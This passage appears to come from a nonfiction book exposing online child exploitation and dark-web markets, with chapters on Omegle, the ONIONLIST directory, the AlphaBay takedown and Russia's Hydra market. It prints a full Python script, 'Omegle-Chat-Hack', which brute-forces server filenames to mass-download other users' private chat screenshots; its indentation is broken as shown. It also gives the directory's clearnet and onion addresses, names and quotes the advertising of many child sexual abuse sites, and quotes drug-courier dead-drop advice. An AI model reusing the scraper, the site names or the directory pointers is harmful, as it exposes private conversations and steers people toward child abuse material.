Screenshot of Omegle’s homepage on May 4, 2015.

 Screenshot of Omegle’s homepage on June 4, 2015.

I have regularly monitored Omegle for the past 5 years, and the site still has
users regularly displaying child porn. At times, the site is actively monitored
by Omegle and perpetrators are quickly “Banned.” But other times, there
seems to be no monitoring whatsoever, and perpetrators run amok on Omegle
displaying child porn to its thousands of users—including children—for
hours, day after day.
Omegle is free and offers online chat with random strangers via text, voice,
or via video link. There is no requirement to register or identify oneself.
While there is an age requirement of 13+, and individuals under 18 are
required to have parental supervision, there is no verification process, and so
is easily avoided.
Conversations on Omegle with strangers can be monitored or unmonitored,
depending on the user's preference. But while “unmonitored’” might seem the
obvious way to go, note that users are warned by Omegle of a greater
possibility they will find themselves at the receiving end of explicit and
inappropriate content when initiating an unmonitored conversation. Users can
even enter into what is known as “Spy Mode” in Omegle. In Spy Mode, they
can ask a question to two people engaged in a chat conversation and also
view their conversation. Alternatively, the “Spy Mode” feature also allows a
user to discuss with another person a question posed by a Stranger.
A user outlines a few of their interests and is then connected to a random
stranger to initiate either a text chat, voice chat or a video link. There is the
option to use monitored and unmonitored forums. A quick read of the terms
and conditions shows how little responsibility this site's developer has to their
users “…human behavior is fundamentally uncontrollable, that people you
encounter on Omegle may not behave appropriately, and they are solely
responsible for their own behavior” stands out in particular, as does the
repeated disclaiming of all liability. With around 25,000 Strangers ready to
chat at any given time, and with some of these being Predators purely there
for sexual purposes, there is a cause for concern.
There is also an option on Omegle to link to other social media such as
Facebook and Twitter. This means that a supposedly anonymous
conversation can be posted to these additional sites, and a user risks revealing
their identity and having their conversations or videos made public.
Furthermore, Omegle’s servers, supposedly protecting the anonymity of its
users, are in fact storing ALL conversations on the website. One cyber
researcher proved this by writing a very simple piece of software that
automatically downloads all the saved screenshots from the website. He
called it Omegle-Chat-Hack, proving Omegle is hackable.
##############################################################
# Omegle-
Chat_hack
# Made by - Indrajeet Bhuyan
(www.hackatrick.com)
#
#
# Version: 0.1
# Date: 07-08-2016 (dd-mm-yyyy)
#
# Version 0.2
# Date: 19-08-2016
#
# This tool downloads random chat logs which are saved in omegle's server.
#############################################################
import itertools
import urllib.request
import os
print("\t\t----------Omegle Chat Hack----------\n")
f=str(0)
url="http://l.omegle.com/"
numberofImagesWanted=int(input("enter limit 100-500 : " ))
for j in range (0,numberofImagesWanted):
 stuff = [ "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "a", "b", "c", "d", "e", "f" ]
for L in range(5, 10):
for i in itertools.combinations_with_replacement(stuff, L):
finalurl=url+str(''.join(i))+".png"
j=j+1
if j==numberofImagesWanted +1:
exit(0)
omRequest = urllib.request.Request(finalurl)
try :
req = urllib.request.urlopen(omRequest)
print('Chat downloaded \n***********************\n')
path = "images"
if not os.path.exists(path):
os.makedirs(path)
filename = os.path.join(path, str(''.join(i))+".png")
output = open(filename,"wb")
output.write(req.read())
output.close()
except urllib.error.URLError as e:
print("Unsuccessful")
#############################################################

So be advised that any data that can be gleaned from a user such as IP,
cookies, and timestamps are recorded and stored. This includes conversations
and video. The site states that these records are “typically stored for
approximately 120 days.” The use of the word typically can mean that
conversations remain stored indefinitely. Any personal information revealed
in any conversation is therefore saved and accessible.
Almost all apps have a system to report and block individuals. Omegle
merely has a Feedback option. The site claims that a chat may be stopped at
any time and as you are anonymous this is sufficient in place of blocking.
Unfortunately, if any personal details or other social media information has
been given, simply stopping a chat may not be enough. Kids sometimes
inadvertently reveal more about themselves than they might wish, such as
wearing school or sport club uniforms while chatting with, or filming in a
bedroom where there maybe identifying pictures or certificates on the walls.
Plus, it has been proven that Omegle is easily hacked.
And the dangers are very real.
In February, a plea deal was reached. After the plea hearing, County Attorney
Tony Palumbo said the plea bargain was best for both sides.
The victims’ parents, who have been present throughout Chinn’s court
appearances, spoke during his sentencing hearing Wednesday about the
impact the crime had on their daughters.
One of the girls has had to change schools, has suffered the return of a
seizure disorder and is experiencing depression. The other continues to
receive extensive therapy.
According to the charging documents, the girls had been communicating with
Chinn via text and other social media apps for about a month in “sexually
explicit” chats.
Chinn had told police he believed the girls were unhappy and agreed to pick
them up near their homes. He drove them around and eventually to his home
in Burnsville. Chinn knew the girls’ ages and acknowledged picking them up,
the documents say.
When officers went to the Burnsville residence, he initially denied that the
girls were there but eventually acknowledged that they were. When officers
searched the residence, they found the two behind a couch.
According to the charges, Chinn engaged in sexual activity with both girls.
He has worked at several metro-area schools and organizations as a coach,
according to authorities.
Officials at Cristo Rey Jesuit High School in Minneapolis placed Chinn on
leave from the part-time job as volleyball coach he began in September.
Chinn also worked as a volunteer junior varsity baseball coach at East Ridge
High School in Woodbury in 2014.

A 40-year-old man has been jailed for six years for inciting young girls to
engage in sexual activity on chat website Omegle.
James Stewart Jones, from Beulah Road, Rhiwbina, Cardiff, used the chat
app to carry out his crimes.
One of his victims was only 11-years-old.
 James Stewart Jones was jailed for six years for his crimes

The court heard he recorded his interactions with the girls and then threatened
his victims with the recordings.
Omegle is a live streaming website for people aged 18 and over and is a
forum where users can ‘Talk to Strangers.’ It picks at random who the user
talks to and uses chat and live streaming based on declared common interests.
In this case, Jones manipulated conversations with his victims to encourage
them to ‘like’ certain topics to increase his chance of re-engaging with them
again on another occasion.
Acting Detective Chief Inspector Mike Yeo, from the South Wales Police
Digital Forensic and Cyber Crime team, said: “Jones was a predatory
offender who used the Omegle app to engage underage victims in live online
streaming for his own sexual gratification.
"He recorded these interactions to retain for his own benefit and to threaten
his victims with the recordings.
“Our experts examined his digital equipment and found indecent images of
children that subsequently led to us being able to protect two young victims
(aged 13 and 11) one in the UK and one in the US."
He was sentenced at Newport Crown Court after pleading guilty to four
counts of inciting a child under the age of 13 to engage in sexual activity, two
inciting a child under the age of 15 to engage in sexual activity, one count of
possession of and to distribute indecent images of children and three counts
of possessing indecent images of children.
DCI Yeo added: “This investigation demonstrates our commitment to do all
we can to safeguard victims of offenses of this nature no matter where they
may be in the world.
"I would urge all parents to be aware of what their children are doing ‘online’
just as you would do with their offline activity.
"We all recognize what a fantastic resource the internet can be provided the
appropriate safeguards are in place.
"It is vital we all talk to our children about their online safety and use some of
the tools within our computer systems to support this protection, even if they
may seem a little restrictive, they are like this for a reason."

The Omegle—xPlay Connection

The web analytics of Omegle (user data) show a strong link to visitors
logging into Omegle directly after using pornographic sites and then
returning to these sites if they are not offered the kind of chat they are after,
revealing Omegle as nothing less than a porn site. Additionally, so-called
“Omegle Captures” appear by the thousands on all the popular porn sites like
PornHub, XVideos, and Xnxx. A Google search for the keyword phrase
“omegle captures” returns, “Watch Omegle Capture porn videos for free, here
on Pornhub.com” at the top of the results.
But beyond the regular porn sites, Omegle Captures of underage children
flood child porn sites on the Dark Web. On xPlay—a child porn site on the
Dark Web with over 10,000 child porn videos—88 videos are returned when
a search is done using the keyword “omegle.” These are all videos captured
from Omegle by Predators of underage children engaged in sexually explicit
chats with titles like “11yr Strips and Dances” (4 minutes, 53 seconds), “13
yo masturbating” (5 minutes, 14 seconds), “Omegle kids reactions to CP” (1
minute and 10 seconds), and “Girls react to CP” (10 minutes, 58 seconds).

XPlay is a child porn site on the Dark Web with over 10,000 child porn videos, as well as over 500
bestiality videos, including some involving children.

Final Word
There are a number of similar apps or websites to Omegle, such as CoolMeet,
ChatHub, Emerald Chat, Chatspin, Shagle, Chatrandom, Dirtyroulette,
Camsurf, Bazoocam, Tinychat which are equally disturbing and filled with
potential threats for children.
 11
ONIONLIST
ONIONLIST (onionlist.org) has 1437 hidden services listed, although over
half are marked as “Offline,” which just goes to show you how unstable the
Dark Web can be. Scammers frequently migrate to new servers, or simply
shut down. ONIONLIST has a brief description for each site listed, and
allows users to vote as a way to expose scams. Many of the sites are also
marked as “SCAM” or “SUSPICIOUS.”

https://onionlist.org
http://onionlstmjc7qkmj.onion
ONIONLIST is listed on both the regular web and the Dark Web:
https://onionlist.org
http://onionlstmjc7qkmj.onion/
It is rather remarkable that ONIONLIST has a website on the regular web
that hasn’t been shut down because not only does it list and rank markets for
buying drugs and weapons, but in the category “Other” it lists no less than 16
active child porn sites—even providing the site’s url—and even giving daily
stats of how many visitors were referred from ONIONLIST. For example, on
July 3, 2020, according to its own stats, xPlay received 335 “Daily visitors
from us.” Remarkably, by providing the url to a child pornography website,
the owner(s) of ONIONLIST risk being charged with distribution of child
pornography.

xPlay. xPlay has a 5 Star rating on ONIONLIST—albeit, only 2 users have

voted—and has the description, “Any kind of porn free.” In fact, xPlay has
over 10,000 child porn videos that can be downloaded for free. It seems that
users can also subscribe and pay for faster downloads. This site has been
around a long time, and I am unaware of any attempts by Anonymous or law
enforcement to take xPlay down. xPlay seems unstoppable.
Alice with violence. A truly disturbing site. “Alice” is a reference to “Alice
Day (see chapter 5), but instead of “childlove” that most Alice Day advocates
talk about, this site features videos of sexual torture of children.

Baby Bitch CP. “Baby Bitch CP is the new child bestiality site on the Dark
Web. 1000s of photos and amateur video clips, full-length movies from the
best producers.” The site claims over 40,000 photos and videos in the
membership area.
Child Porn Station. “Over 1 TB of archive, private membership, high
privacy payments are here.” It charges $100 for 3 months membership.

Golden Pedomom. “Pedomom & Pedofamily & Incest Thread, child porn.”
Users are told, “To activate the account to send 0.0035 BTC.” Then, “A small
payment will be sent back to your BTC Wallet. Its the password. Example:
you received BTC 0.0001910, your password will be the 1910.” This is how
most of these sites seem to work.

Illicit Country: Pedomom, Pedofamily, Boys & Girls. “Forbidden child

porn on our site. Sex with young children from 8 to 12 years.” The site claims
to have “The Largest Pedo Collection” and invites users to join in order to
“Watch over 500 exclusive pedo videos.”

Lolita.CP. “For fans of little girls and boys a huge collection of nude
children.” The site specifies it hosts, “Videos of children and teens from 6 to
13 y.o. 120 GB. Updated 2 times a month.”

Naked & Smalls. “Welcome to the child porn site. The BEST hardcore CP
porn! Watch the hottest child ass and anal porn movies from the top gonzo
film creators inside.” Site ads, “2000+ Movies (CP, Pedomom, Incest).”

“Child porn, cp, sex with child, incest, preteens, teens, girls and boys...”
PedoFix. “Pedo Movie and Video Portal.” Site says it “has an extensive
content library with over 50,000 videos sent by our users to whom we pay to
create their videos in the best possible quality so we can provide them to give
you the best experience. You ask and we deliver.”

Playground Molly. “Join Demystifying and celebrating alternative child

sexuality by providing the most authentic kinky videos. Experience the other
side of porn.”

Real Loli Porn 2.o. “Real Loli Porn is a child porn photo and video
collection website exists since 2013. Here you can find over 70,000 photos
and over 20,000 homemade porn videos of girls from 5 to 16 years old.”

Revtube. “Revtube - CP, Zoo, Rape, Forced, Blackmail, Revenge Porn, Gore
and snuff porn tube.” The site states it includes underage porn.
Tabu Child Porn. “For fans of little girls and boys a huge collection of nude
children. All of this specially for you in our galleries. High quality of
content.” The site adds, “For fans of pedophilia! Always new and fresh! No
actors!”

True Amateurs. “At True Amateurs, mothers sleep with their childs, small
brothers shamelessly seduce child sisters, fathers eye their teen childs
daughter’s best friend.”

Your Porn CP Box. “The best child porno collections assorted by us by

categories, age groups, gender and themes.”

Final Word
The ease at which online child pornography can be found is truly alarming
and appalling. There are sites like Onionlist, which has a website on the
regular internet (onionlist.org) that unashamedly lists numerous child abuse
sites. There are onion search engines on the regular internet, too, such as
OnionLand (onionlandsearchengine.com), where one can type in keywords
related to child porn and dozens of child abuse sites show up. Using web
browsers like Chrome, Edge, or Firefox and sites like Onionlist or
OnionLand, one can locate dozens of child abuse sites in a matter of minutes.
Of course, to visit a child abuse site on the Dark Web, one needs to use the
Tor browser. The media always makes it sound like you need to be a
computer whiz to access the Dark Web. Nothing could be further from the
truth. If you can download a regular browser like Chrome, Edge, or Firefox
and type in “website.com,” then you can download the Tor browser and type
in “website.onion.” There is no mystery to it. Accessing illegal content on the
Dark Web is uncomplicated.
So, is it possible to shut down these domains, while preserving the anonymity
necessary for journalists, freedom fighters, and citizens in oppressive
countries? As yet, no one has found an answer to that question.
 12
ALPHABAY TAKEDOWN
The AlphaBay market launched in December 2014, and it immediately got a
surge of new registrations after another Dark Web market called Evolution
pulled an exit scam in March 2015. Users flocked to AlphaBay at the time,
giving the site a huge boost right from the get-go, with 14,000 new users in
the first 90 days of operation. In May 2015, the site announced an integrated
digital contracts and escrow system that allowed users to make engagements
and agree to provide services in the future, according to the terms of the
contract, boosting user confidence. By October 2015, AlphaBay was
recognized as the largest Dark Web market, and the market continued to
grow at a steady pace, receiving a new influx of users after TheRealDeal
market mysteriously vanished in the summer of 2016.
The first and previously most famous black market on the Dark Web was Silk
Road, which was taken down in 2013 and whose operator, Ross Ulbricht, is
currently serving a life sentence. AlphaBay was 10 times larger than Silk
Road. At the time of its demise in July 2017, AlphaBay had over 200,000
users and 40,000 venders.
The founder of AlphaBay was a Canadian named Alexander Cazes, who was
arrested in Bangkok, Thailand based on an international arrest warrant issued
by the US for drug trafficking charges. Police seized three houses and four
Lamborghinis, valued at $12.5 million. But on July 12, 2017, the 25-year-old
alleged mastermind committed suicide in jail by hanging himself with a towel
while waiting for the extradition to the US.
AlphaBay was a Dark Web market responsible for the trading illicit commodities including drugs,
firearms, and cybercrime malware. As of June 2017, there were approximately 369,000 listings.

AlphaBay was the largest criminal marketplace on the Dark Web, utilizing a
hidden service on the Tor network to effectively mask user identities and
server locations. Prior to its takedown, AlphaBay reached over 200,000 users
and 40,000 vendors. At the time of its takedown, there were over 250,000
listings for illegal drugs, and over 100,000 listings for stolen and fraudulent
identification documents and access devices, counterfeit goods, malware and
other computer hacking tools, firearms, and fraudulent services. A
conservative estimation of $1 billion USD was transacted in the market since
its creation in 2014.
During its operation, AlphaBay charged a commission for every transaction
conducted by users. The commission rate varied based on the seller's history,
volume, and trust level on the site, but generally varied from 2-4%. AlphaBay
also offered a referral program whereby a user received a portion of the
commission earned from users referred to the site, thereby encouraging
existing users to introduce new users to the site and increase the sales
volume. In addition, AlphaBay kept the value of Bitcoin or other
cryptocurrency left behind by users who were banned from the site or
otherwise abandoned their AlphaBay accounts.
Transactions on AlphaBay occurred through cryptocurrencies hosted and
controlled by the site. To purchase illegal goods and services, users
transferred funds into the site's cryptocurrency addresses, where the funds
were held in escrow until the transactions were completed. After a transaction
was completed, and AlphaBay took its approximate 2-4% cut, users could
send their cryptocurrencies to private addresses not controlled by the site.
Because cryptocurrency transactions can in theory be traced through the
Blockchain, "tumblers" and "mixers" could be used to obscure the historical
trail of the cryptocurrencies' movements. Tumblers and mixers obscure
transaction histories by combining, splitting, and re-combining Bitcoins
through a series of wallets controlled by the tumbler or mixer. According to
postings on AlphaBay, the site introduced a tumbler in approximately April
2016. One such posting stated:
AlphaBay can now safely be used as a coin tumbler! This means than
no level of blockchain analysis can prove that your coins come from
AlphaBay since we use our own obfuscation technology. Making a
deposit and withdrawing after is now a way to tumble your coins and
break the link to the source of the funds. Since tumbling is not illegal,
and since we leave no paper trail, you now have ironclad plausible
deniability with your Bitcoins.
This meant that not only were Bitcoin transactions pseudonymous, but such
transactions were also entirely anonymous, thus giving users the confidence
to conduct illegal transactions without getting busted.
Between May of 2016 and when the site was taken down, law enforcement
agents participating in this investigation made numerous undercover
purchases of controlled substances (marijuana, heroin, fentanyl,
methamphetamine), fake identification documents, and an ATM skimmer
from AlphaBay vendors. Samples of the controlled substances purchases
have been laboratory-tested and have typically shown high purity levels of
the drug the item was advertised to be on the AlphaBay website. Based on the
postal markings on the packages in which the drugs and illegal items arrived,
these purchases appear to have been filled by vendors located across the
country.
Cazes was worth about $23 million US, including $12.5 million in properties and vehicles, and the rest
in cash and cryptocurrencies.

Cazes was born on October 19, 1991, and he grew up just outside Trois-
Rivières, 150 kilometers downriver from Montreal. His father, Martin, a
garage owner, described his son as a trouble-free child who was so gifted that
he skipped a year ahead in school. “An extraordinary young man, no
problems, no criminal record,” the elder Mr. Cazes recently told the TVA
news network. “He never smoked a cigarette, never used drugs.”
Alexandre Cazes was 17 when he founded his own business, EBX
Technologies, which he incorporated as a company selling software and
repairing computers. The family believed that he had made his fortune by
transacting in digital currencies, but EBX Technologies was simply a front.
At the time the FBI shut it down, AlphaBay allegedly carried 250,000 listings
for illegal drugs and chemicals and more than 100,000 listings for stolen
items. This dwarves the 14,000 listings that had existed on Silk Road, another
infamous Dark Web marketplace that was dismantled by the FBI in 2013. In
fact, Mr. Cazes launched AlphaBay just a few months after Silk Road was
put out of business. Like its predecessor, AlphaBay operated on the Dark
Web, which means the marketplace could be accessed only through Tor, an
increasingly popular software that enables anonymized internet
communications that are very difficult to trace, even for government-
intelligence agents. In addition to selling drugs, AlphaBay users also sold
weapons, computer malware and stolen credit card information. AlphaBay
grew to have about 10 employees. “We take no responsibility if you get
caught,” the site warned, “so protecting yourself is your responsibility.”
But the 25-year-old millionaire failed to protect himself and planted the seed
of his downfall when he left his personal Hotmail email address visible
online. It was that clue which led police to arrest him as the alleged
mastermind of AlphaBay.
In the course of the investigation, law enforcement agents identified Cazes as
“Alpha02” and “Admin,” the founder and administrator of AlphaBay.
According to AlphaBay's FAQs, “AlphaBay Market was founded by alpha02,
reputable member on most carding forums. After some time helping others
on carding forums, he decided to start his own marketplace and allow sellers
from around the world to sell goods to buyers worldwide.” Early pages of the
AlphaBay site listed a “copyright” mark indicating that the site was “proudly
designed by Alpha02.”
From the site's launch in December 2014 through August 2015, Alpha02's
public profile on AlphaBay listed him as the “Administrator & Owner” of the
site. It is also stated that “Alpha02” joined the site on July 14, 2014, which
pre-dated the public launch of the website by approximately six months.
Alpha02's profile signature block also indicated that he accepted “private
messages from staff only.” Until August 2015, Alpha02 was also a prolific
author on the AlphaBay forums and his posts were tagged with the
“administrator” designation, indicating that Alpha02 had site ownership
privileges.
In August 2015, the username for the AlphaBay administrator account
changed from “Alpha02” to “Admin.” Around the same time, Alpha02
posted a message on the AlphaBay forum stating, “alpha02 account will be
renamed to 'Admin'. This account will ONLY accept private messages from
Staff.” The AlphaBay profile for Admin at the time of the takedown showed
that it was the same account previously labeled “Alpha02,” and that moniker
was simply changed. Admin has been a member since July 27, 2014, and as
described below, evidence located at the time of Cazes’ arrest confirmed that
Cazes continued using the Admin profile after August 2015.
In December 2016, law enforcement learned that Cazes’ personal email was
included in the header of AlphaBay's “welcome email” to new users in
December 2014. Specifically, soon after AlphaBay was launched, the site
established an online forum allowing customers and vendors to discuss their
business. One feature of the sign-up process was new users had to provide an
email address for password recovery in case the user lost his/her password.
Once new users joined the forums and entered their private email accounts,
they were greeted with an email directly from AlphaBay welcoming them to
the forums. The email address of “[email protected]” was
included in the header information of the AlphaBay welcome email.
Cazes’ personal email was also included in the header of AlphaBay's
“password recover process” used by AlphaBay forum users who lost their
passwords. In late December of 2014 when users initiated a password
recovery for the AlphaBay forums, they received an email from AlphaBay
directing them to a link to reset their password. As with the welcome email,
the header of the reset email had a sender email address of
“[email protected].”
Law enforcement subsequently learned the “[email protected]”
email address belonged to a Canadian man named Alexandre Cazes with a
birthdate of October 19, 1991, matching the numeric identifier in his Hotmail
email address. Cazes was a self-described independent website designer
affiliated with a company called EBX Technologies ("EBX Tech"). Law
enforcement reviewed the LinkedIn profile for “Alexandre Cazes,” which
identified Cazes as an employee for EBX Tech with the following IT skills:
concurrent programming, web hosting, email hosting, web development,
network administration, server administration, network security, graphic
design, custom software development, web application design, cryptography,
software architectural development, database design, and database
administration. It also listed additional IT skills and proficiencies as: Eclipse,
Java, JavaScript, Linux, Oracle (Cloud Computing), SSL Certificates
(required for encryption key), VB.NET and ASP.NET (used for
visual/website software framework). MySQL and PostgreSQL (used for open
source database management systems), HTML, PHP and CSS (script/markup
language used in web development). So he definitely had the computer skills
to create and run AlphaBay.
Law enforcement also learned about a December 3, 2008 post on the online
tech forum “www.commentcamarche.com” by user with the name of
“Alpha02.” The “Alpha02” user posted information in French on how to
properly remove a virus from a digital photo. At the end of the post, the
“Alpha02” user included his name, “Alexandre Cazes,” and his email
address, “[email protected].” law enforcement authorities then
confirmed that Alexandre Cazes was a Canadian citizen residing in Thailand.
Law enforcement also uncovered additional facts indicating that Cazes was
“Alpha02,” including financial transaction information linking him to
AlphaBay and financial records indicating that Cazes had many millions of
dollars’ worth of investments throughout the world without any lawful
source. In fact, Cazes owned real estate in Bangkok, in the resort town of
Phuket, in Cyprus and in the Caribbean state of Antigua and Barbuda. He
obtained citizenship in Antigua thanks to his $400,000 purchase of a
beachfront property. Cazes was also in the process of acquiring Cypriot
citizenship by spending €2.4-million ($3.5-million) to buy a villa in
Famagusta, a picturesque port on the east coast of Cyprus. Cazes’ assets
seized by the U.S. government included $6.6 million Cdn in Bitcoin, $2.4
million in Etherium, $622,000 in Monero, and $980,512 in Zcash. He had at
least 11 bank accounts and cryptocurrency exchange accounts registered in
his name or his wife's name in Thailand, Liechtenstein, Switzerland, and St.
Vincent and the Grenadines.
Additionally, Cazes was logged into the AlphaBay website as “Admin” on
July 5, 2017, when law enforcement searched his residence, and was in active
communication with one of the AlphaBay data centers about a law
enforcement-created service outage on the site. Finally, passwords to
AlphaBay's servers and other infrastructures were found on Cazes’ personal
computer at his residence, as described below.
Law enforcement further determined that Cazes owned and controlled EBX
Technologies, a front company he used to justify his banking activity and
substantial cryptocurrency holdings. EBX Technologies claimed to provide
web design services, but the website for EBX Technologies was barely
functional and did not appear to support any substantial business operations.
Although EBX Technologies appears to have been created in 2008, the blog
for the website had not been updated since January 2015. A review of EBX
Tech's bank records showed little to no business income or banking activity.
In the years before his arrest, Cazes maintained several bank accounts in the
name of “EBX Technologies” and used these “business” bank accounts to
create digital exchange accounts so he could liquidate and manage his
cryptocurrency.
Law enforcement obtained Cazes’ PayPal account records that show several
accounts registered in Cazes’ name. To open and maintain one PayPal
account, Cazes listed email addresses “[email protected]” and
“[email protected].” PayPal account statements further show that
Cazes made regular payments to the RooshV forum, and was an active
member of the forum. The forum was run by American blogger RooshV,
whose real name is Daryush Valizadeh, a self-styled pickup artist who is
known for misogynistic behavior and for giving men advice on how to sleep
with as many women as possible. Cazes routinely posted on RooshV about
his financial success and expertise with cryptocurrency. He bragged about
buying a Porsche Panamera, and when other users doubted his ownership, he
posted a video of himself driving the vehicle. He also posted about how to
pick up Thai women, and bragged about getting a “solid prenup,” sleeping
with women outside his marriage, and telling his wife

Final Word
In the “About Me” section of AlphaBay, Cazes wrote that he wanted the site
to become “the largest eBay-style underworld marketplace.” Despite his
success in creating an extremely profitable illegal marketplace, he was
brought down by a Hotmail address and an unencrypted laptop.
Within days of his arrest on July 5, Cazes was found dead hanging in a
Bangkok jail. His apparent suicide occurred ahead of his extradition to the
United States, where he was indicted on 16 criminal counts, including
racketeering, narcotics conspiracy and money laundering.
Days later, Martin Cazes’ Facebook account contained many messages of
sympathy and condolences for his son. In Quebec, Martin Cazes can't
comprehend that Alexandre's life ended in such a fashion. "In my heart as a
father, it's hard to accept that my son committed suicide," he told a
Francophone TV program TVA. “He was under police supervision. It's
unbelievable.”
 13
HYDRA: POKÉMON GO FOR DRUGS
A senior police investigator named Evgenia Shishkina was murdered in broad
daylight as she was leaving for work. Lieutenant Colonel Shishkina’s
daylight assassination is one of the first cases of murder that has been ordered
on the Dark Web (see chapter 13 for more details). The assassination contract
took place through the Dark Web drug trading platform called Hydra
Marketplace, from where the gunman was hired. The gunman was hired by
the owner of a store selling drugs on the Hydra platform. As the police
investigated the murder closely they have uncovered the sheer scale of the
Hydra in Russia.
Hydra (hydraruzxpnew4af.onion) has a staggering 2.5 million registered
accounts and 400,000 regular customers. The largest Western Dark Web
market, AlphaBay, which was taken down by the FBI in 2017, had 200,000
registered users at its peak. But Hydra isn’t just bigger. It’s a new kind of
Dark Web marketplace. Much of Hydra’s setup will look familiar to Dark
Web drug buyers: Logging in using the Tor browser, perusing an eBay-style
catalog of brain-tickling chemicals, forums and customer reviews, paying via
Bitcoin. But it has a strict way of doing business and code of conduct
overseen by a small army of moderators. While in other markets vendors pay
once to open an account, on Hydra every one of its estimated 5,000 shops has
to pay a monthly rent. This starts at $100 a month and rises to $1,000 a
month for an enhanced account, known as a Trusted Seller, whose ads appear
on the top banner. Trusted Sellers must have racked up at least 1,000
transactions and customer disputes can’t exceed 7% of the total number of
orders in a given month.
Hydra vendors, such as Walt Disney Drugs, Pyramid Market, and PokemonGo, show off their
merchandise, which comes with detailed descriptions and customer reviews to ensure buyers know
what they are purchasing.

Hydra has learned from previous Dark Web markets and know that trust is
key, so Hydra has a sophisticated quality assurance set up. Hydra even has its
own team of chemists to test products, along with a subforum where these
test results are posted with graphs, analysis, and photos. If the drugs don’t
measure up, the site hand out penalties. Anyone trying to pass oregano as
high-grade chronic will get kicked off the site. No fentanyl is allowed, and
neither are weapons, hitmen, malware, or porn, although drugs, fake
passports, and counterfeit money are allowed to be sold.
Hydra has radically changed the way drugs are sold to buyers. With the help
of an invisible army of mostly young couriers known as “kladmen”
(“droppers”), Russia’s traditional street drug trade has dwindled. No longer
are drug dealers standing on street corners selling drugs. Drug buyers in
Russia turn to Hydra, and upon completing the online transaction, buyers are
sent coordinates, photos, and directions to a “dead drop.” At any given hour
in Russia’s cities and towns, there are dozens, if not hundreds, of suspicious-
looking characters scurrying around parks and city centers burying stashes of
drugs such as mephedrone, cocaine, MDMA and weed, ready to be picked up
by buyers. These dead drops can be anywhere from tree hollows, street
bushes, round the back of apartment blocks or electrical transformer boxes, in
crowded public locations, near metro stations, or local forests.
To accompany Russia’s new, highly illegal profession, there is a handy
guide. All is revealed in the Kladman’s Bible, a 26-page how-to guide for
Hydra’s droppers. The bible advises droppers to use encrypted phones (so
police cannot track previous drops) and map-downloading tools (to mark
drops without having to go online). “You need to look normal, average, but
neat, and most importantly, move confidently, calmly. You don’t have to turn
your head like an idiot to focus your eyes on a specific subject,” it says.
“Don’t act suspicious or be in a hurry; don’t go around dressed like a punk or
a hobo; by the same measure don’t go in a suit and tie either. It would be
weird if someone sees an office manager crawling around the bushes.” Good
hiding places are places “where the customer has to reach their hand around
somewhere,” such as tall bushes and electric transformer boxes. Bad places
are near schools, cemeteries, and police stations (because they can draw
unwanted attention) and apartment block courtyards (because the gates might
be closed when the customer gets there).

One of many “kladman” adverts on Hydra

With its business booming, Hydra has created a whole new profession for
young Russians. According to the Russian Ministry of Justice statistics, more
than half of those convicted of drug trafficking are 18-25 years old and
students. That has a lot to do with Hydra droppers. It’s the same kind of
people who work at Yandex Pizza Club—a big online food order and
delivery service in Russia. In fact, the adverts for droppers on Hydra are
almost exactly the same: flexible working hours, fit around your study time.
While Yandex promises at least 1000 rubles a day, a typical kladman will
earn three times that.
Whereas Dark Web drug markets in the West are often one person or a small
group operation, vendors listed on Hydra are much more likely to be
representative of a larger network of actors. That makes Hydra a lot more
visible to police, but that does not make it easier to investigate. Those
working at the retail end, who make the largest amount of drops, have a much
higher chance of being caught. Yet when they are caught, they usually know
little about anyone else in the vendor network and consequently, the law
enforcement investigation typically ends with them.
But Hydra’s way of carrying out a Dark Web drug market may be coming to
the West soon. In December 2019, Hydra announced an Initial Coin Offering
(ICO) to fund the development of Eternos. Hydra claims to have sold
1,470,000 coins called Token (49% of the total supply) at $100 per Token.
The offering ran one round, raising $147 million, and the Tokens have been
distributed to Hydra wallets and are frozen until Eternos’ launch. ICO
participants who bought at least 101 Tokens will get 0.00333333% of profit
generated by the marketplace for every 100 Tokens held in a wallet.
Investments are expected to be paid off over six months and will bring in a
potential monthly income as high as $500 by September 2021. Eternos will
pay dividends in Bitcoin every month.
Hydra plans to list Tokens on ChangePoint and other exchanges. They
forecast a 600% price hike of coins during the first six months after the
opening of Eternos.

Hydra is planning to use the money to fund a project called Eternos, which
will be another Dark Web market but will also host a digital asset exchange,
encrypted messenger services, and it will supposedly run on a native
anonymous browser.
The claims in Hydra’s offering memorandum are nothing if not bold.
Boasting proficiency in security and attack resilience, the team behind Hydra
says it wants to introduce the rest of the world to its “contact-free” method of
trading contraband, in which the buyer, seller, and courier never meet. “It will
start a new era in the West. The scale of expansion is hard to imagine,” the
memorandum says.
Developers will not disclose data on software and infrastructure until Eternos
opening due to security reasons. However, Hydra’s staff published a list of
special features, which they are planning to implement in the digital platform:
AspaNET–software for enabling anonymous communication.
Eternos will be running atop its own network AspaNET, created to
bypass Internet censorship and filtering. Developers claim that
AspaNET is able to get through the Chinese Golden Shield Project
and the Russian Sovereign Internet. AspaNET solves a lot of
problems with using Tor and belongs to a new generation of
anonymity networks. The program has already been successfully
tested in China and Turkey.
HatchService–a utility for gateway creation.
Every person will be able to open his own gateway or a gateway
station on AspaNET using HatchService. Gateways’ owners will get
a reward for providing access to AspaNET and its services.
IronRat–Artificial Intelligence software to automate dispute resolution.
IronRat’s database includes info on 360,000 tickets opened on
HYDRA. AI is capable of resolving about 90% of all disputes.
Moderators will deal with the remaining 10%, thus significantly
reducing wait time and improving service quality.
Whisper–anonymous messenger.
Whisper is an advanced communication system with several
anonymity tools (PGP, VPN), filters and notifications. Whisper will
function as an independent app, allowing Eternos’ users to send
messages even if DNM is offline.
ChangePoint–cryptocurrency exchange.
ChangePoint will consist of two platforms: LocalPoint and
GlobalPoint. The first one is a peer-to-peer cryptocurrency
 marketplace (analog of LocalBitcoins). GlobalPoint is a classical
crypto-fiat and fiat-crypto exchange, run by different operators.
Eternos suits both small- and large-scale vendors. Bulk traders will get an
option of setting up a shop with additional functions:
HR Department (for hiring and managing staff, for example,
dead-droppers, couriers, administrators).
Logistic service (helps to choose the safest delivery route).
Reference and legal system.
Economic service (for making reports, forecasting profit, and
data visualization).
Digital advertising platform.

Hydra’s moderators will recruit vendors willing to work on Eternos.

Final Word
There is cause for serious skepticism about Hydra’s ICO. Given the illicit
nature of its business, Hydra’s token offering is undoubtedly the most brazen
ever, and could simply be an exit scam, a very common occurrence on the
Dark Web.
 14
HITMAN FOR HIRE
